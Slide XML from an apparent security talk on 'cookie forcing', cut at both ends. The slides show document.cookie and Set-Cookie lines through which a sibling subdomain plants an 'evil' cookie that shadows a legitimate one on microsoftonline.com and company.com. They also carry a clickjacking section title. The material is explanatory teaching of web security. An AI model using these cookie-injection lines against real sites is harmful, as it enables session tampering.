              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rigin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>olicy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234096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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ookie String</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smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=f1e332a9ac99;language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>en;chksv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=904;siteinfo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>khlm;ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=0;language=BOO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="3346618"/>
            <a:ext cx="1524000" cy="46338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69105" y="3822868"/>
            <a:ext cx="1524000" cy="4572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667375" y="2730668"/>
            <a:ext cx="19431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V="1">
            <a:off x="5105400" y="4407068"/>
            <a:ext cx="0" cy="685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flipH="1">
            <a:off x="5267325" y="1625768"/>
            <a:ext cx="2811780" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This cookie is usually the one used by script and web apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3810000" y="4978568"/>
            <a:ext cx="2811780" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This cookie usually gets ignored</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1006531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Cookie” Hurdle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an attacker can merely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (not read) the cookies, that’s bad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But how can an attacker make a victim’s browser send his cookie FIRST in the list of cookies of the same name?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution: Browser cookies’ Same Origin Policy essentially allows for sibling (or related) domains to set “more specific” cookies for everyone else in that root domain space.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36015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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the quickening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172125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we begin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I am NOT talking about reading cookies.  ONLY WRITING them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie Same Origin Policy problems are nothing new. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Evans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> blogged about a similar type of thing a few years ago calling it “Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forcing” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214668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0764" y="402610"/>
            <a:ext cx="7098482" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Only running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>test.microsoftonline.com –</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196807" y="1676400"/>
            <a:ext cx="8947193" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2. script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=second; domain=.microsoftonline.com; path=/'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie string sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>test.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=second’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200765" y="950025"/>
            <a:ext cx="8632812" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1. script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=first; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>domain=test.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>; path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=/'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie string sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>test.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200765" y="2438400"/>
            <a:ext cx="8947193" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3. script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>; domain=.microsoftonline.com; path=/site'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie string sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>test.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200765" y="4267200"/>
            <a:ext cx="6733575" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie string sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>test.microsoftonline.com/site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=first; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200765" y="5257800"/>
            <a:ext cx="8558753" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie string sent to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://chicken.monkey.camel.emu.secure.microsoftonline.com/site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196807" y="3334987"/>
            <a:ext cx="5366662" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie string sent to microsoftonline.com/site: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231150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cookie wins?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4751545"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>FIRST: https://admin.company.com  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>goodvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>domain=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>admin.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>company.com; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>path=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>;secure; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>THEN: http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>://foo.beta.test.temporary.company.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>200 Response: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cookname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>evilvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>; domain=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
